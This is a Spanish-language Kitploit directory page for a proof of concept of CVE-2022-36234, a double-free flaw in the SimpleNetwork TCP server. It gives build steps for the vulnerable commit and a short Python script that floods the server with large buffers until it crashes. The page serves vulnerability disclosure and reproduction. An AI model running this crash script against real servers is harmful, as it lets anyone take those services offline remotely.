Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-36234 — Prueba de concepto para CVE-2022-36234 | Kitploit
Herramientas/GitHubGitHub/halcy0nic/cve-2022-36234
Análisis de VulnerabilidadesExplotaciónFuzzingPruebas de PenetraciónAprendizaje y EducaciónExplotación de Binarios
GitHubhalcy0nic/cve-2022-36234

CVE-2022-36234

Prueba de concepto para CVE-2022-36234

Ver Repositorio
2hace 3 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Descripción de CVE-2022-36234

Se descubrió que la confirmación 29bc615f0d9910eb2f59aa8dff1f54f0e3af4496 del Servidor TCP SimpleNetwork contiene una vulnerabilidad de doble liberación (double free) que se explota mediante paquetes TCP manipulados. Provocar la doble liberación permitirá a los clientes bloquear cualquier servidor TCP SimpleNetwork de forma remota. En otras situaciones, las vulnerabilidades de doble liberación pueden causar un comportamiento indefinido y potencialmente la ejecución de código en las circunstancias adecuadas.

Reproducción

Para asegurarte de que tienes las herramientas de compilación estándar necesarias para compilar la biblioteca, instala los siguientes paquetes (en la mayoría de los sistemas esto ya estará instalado):

root@kitploit:~
sudo apt-get install build-essential git

La vulnerabilidad se puede reproducir enviando solicitudes consecutivas al servidor que contengan un búfer grande de caracteres en un paquete TCP. Primero, compila la biblioteca 'libSimpleNetwork' y el servidor de ejemplo proporcionado en el código fuente:

root@kitploit:~
git clone https://github.com/kashimAstro/SimpleNetwork.git
cd SimpleNetwork
git checkout 29bc615f0d9910eb2f59aa8dff1f54f0e3af4496
cd src
make
cd ../example-server
make

Iniciar el servidor de ejemplo:

root@kitploit:~
./server 80 1

Guarda el siguiente script de prueba de concepto en python3 en un archivo (modifica el host según sea necesario):

root@kitploit:~
import socket

host = "localhost"
port = 80                   # El mismo puerto utilizado por el servidor
buf = b'A'*10000

try:
    for i in range(50):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, port))
        s.sendall(buf)
        data = s.recv(1024)
        s.close()
        print('Received', repr(data))
except:
    print("Completed...")

Ejecuta el script python3:

root@kitploit:~
python3 poc.py

Verificación del bloqueo:

Si tiene éxito, el servidor se bloqueará y verás la siguiente salida de la aplicación:

root@kitploit:~
segmentation fault  ./server 80 1

Referencias

  • https://owasp.org/www-community/vulnerabilities/Doubly_freeing_memory
  • https://cwe.mitre.org/data/definitions/415.html
  • https://github.com/kashimAstro/SimpleNetwork/issues/22
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36234
Descargar herramienta